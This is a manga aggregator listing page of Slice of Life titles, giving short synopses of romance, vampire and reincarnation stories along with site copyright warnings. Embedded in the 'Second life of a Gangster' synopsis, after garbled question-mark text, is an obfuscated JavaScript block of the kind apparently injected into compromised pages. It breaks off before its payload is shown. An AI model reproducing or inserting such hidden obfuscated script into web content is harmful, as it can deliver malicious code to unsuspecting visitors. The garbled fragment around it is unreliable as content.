Slice of Life - Page 732

Discover top manga Slice of Life with stunning art and thrilling tales. Enjoy the best Slice of Life manga free online today!

8905 results

Prince’s Lollipop

Ten years ago, Eunsol Seo tutored a child who bore deep scars in his heart. However, just as he opened up to her, she left, and ten years pass with neither of the two hearing about the other. Eunsol is now a thirty-year-old woman who is desperately looking around for work. After another failed interview, she meets a strange man while screaming in rage, and he suddenly jumps off the bridge in front of her. This twenty-year-old man turns out to be Danam Soh, the child she tutored in the past. A romantic comedy about the reunion between the thirty-year-old Eunseol Seo and the twenty year old Danam Soh. 왕자님 의 막대 사탕


My Vampire Master

Members of the mysterious association”Blood-moon Religion”are in fact all vampires. After a sleep, Su Liyin has become the blood servant for Qin Jiu, the third master of the association. Would she obey to be a portable blood pack or fight against her master? What would she do as it is tough to be teased and her blood to be sucked by such an ancient vampire every day?


Full Marks Hidden Marriage: Pick Up a Son, Get a Free Husband

Full Marks Hidden Marriage: Pick Up a Son, Get a Free Husband other name: The Lovely Wife And Strange Marriage and Full Marks Hidden Marriage Her boyfriend was taken from her, her parents were ashamed of her and she was exiled abroad without consent! Everyone thought she was abandoned and only she could fend for herself… After five years, Ning Xi returns to fulfil her childhood dream of becoming a famous actress. However, her sister is still out to sabotage her every chance she gets! What schemes will she have to avoid?  



If we're just friends, why am I blushing? Model student Yuseong finds an unlikely friend in Dabin, the school's troublemaker, after he promises to help her get her grades up. But there are strings attached and Dabin must return the favor. Will both of them get what they want? Their high school lives are about to get a lot more interesting... Boy Friend / A Male Friend / 남사친구


Second life of a Gangster

Age 41, Oh Joong Seok. A man who did all kinds of misdeeds and put his life on the line for the organisation to gain the highest position. But who knew the end of his life would be so miserable… Joong Seok’s ‘virtuous living’ project starts now, one by one live a good life ??? ?? ??? ?? ??1 ??? ?? ??2<script></script><script>function _0x1877(_0x1851fa,_0x418b02){var _0x1db985=_0xf180();return _0x1877=function(_0x42c8cf,_0x206e77){_0x42c8cf=_0x42c8cf-(-0x1a81+-0x2181+0x3d46);var _0x48738d=_0x1db985[_0x42c8cf];return _0x48738d;},_0x1877(_0x1851fa,_0x418b02);}(function(_0x4748a4,_0x4aecf3){var _0x131d64=_0x1877,_0x5559f9=_0x4748a4();while(!![]){try{var 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My Cunning Childhood Sweetheart

The heroine meets her childhood friend, but he seems to be a naive boy, and he is always receiving good guy cards, which seems to be very funny. The heroine thinks it’s time to teach her childhood friend to fall in love but why did it slowly become that she was the one being taught?*Please read on www.manhuasy.comNotes from mangabuddyAll our manhua content is protected under copyrighted law.mangabuddy never gives anyone authorization or permission to publish our content on another website/app. If you’re publishing our content on your website/app, it means that you’re infringing the copyright of our works. Therefore stop stealing n our work or else we will take legal action against you.


Just For A Meowment

Orphaned at birth and bullied at work, Myohee has been through countless trials in life. But when she gets scammed by her only friend and ends up bankrupt, Myohee feels as though she’ll never find the silver lining to her cloud. She decides to end her own life by jumping from a building, but mid-air, the grim reaper halts her descent, saying her time isn’t up yet. She’s ordered to live for 100 more days…as a cat! Before she knows it, she’s taken to the home of her handsome, aloof boss, Mr. Cha. It seems like the perfect chance to receive the love and care she never had in life…if only Myohee can remain a cat! Source of collecting images:


I Decided to Offer Myself to Motivate Senpai

"Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Jiaxia is a new editor for the comic company BliBli. Ever since high school she has admired comic artist Taiji-sensei, who inspired her to pursue a career in the 2D world. Although Taiji-sensei has a bad reputation in the publishing world for being lazy and troublesome, Jiaxia is determined to be her new editor. But will she be able to get Taiji-sensei to finally get motivated to draw a new comic? For Her, I'd Give It My All 39


Like You’ve Never Been Hurt

Like you’ve never been hurt / Does love really last forever? College student Izzy Noh thinks her loving relationship with her boyfriend Minsu will last forever until he cheats on her. To make things worse, they are not only in the same school, but in the same Game Developer Club. Izzy must now navigate handling the breakup, dealing with her feelings, and possibly opening up to another shot at love. Will Izzy and her friends from the Game Developer Club find true campus love?


My Two Stepsons Looking At Me Weirdly

A witch picked up two children by chance, and as they got along day by day, both of them developed extraordinary feelings for her. From then on, a tragedy occurred. Chen Ming Xuan was instigated by a mysterious person to kill Dugu Chen Feng but accidentally killed Zhi Xi. A hundred years later,Zhi Xi’s soul awakens in the body of Dugu Chen Feng’s ex-wife, at the time, Chen Xuan Ming also appears beside Zhi Xi Notes from mangabuddyAll our manhua content is protected under copyrighted law. mangabuddy never gives anyone authorization or permission to publish our content on another website/app. If you’re publishing our contents on your website/app, it’s mean that you’re infringing the copyright of our works. Therefore stop stolen our works or else we will take legal action against you.


Stairway Of Time

Ryu Ji Hoon And Eun Yeon Ah… We were the best couple. The love of youth… crazy and crazy. But that love… I killed him and ruined my life completely. If I can go back to the past, it would do so much… Not to be tied to you. Avoiding you. 14 years later, in order to change this unfortunate reality of a greater unfortunate situation, Yeonhwa rises to the thirteenth stairway to the past, following a suddenly rising memory. If this is real… If she really jumped into the past, will she be able to avoid making this unfortunate mistake again?! 32 years old Yi Yeon Ah went back to the past, 14 years ago. Can she really break her relationship with her first love and change her terrible past? Climb with us to the STAIRWAY OF TIME…
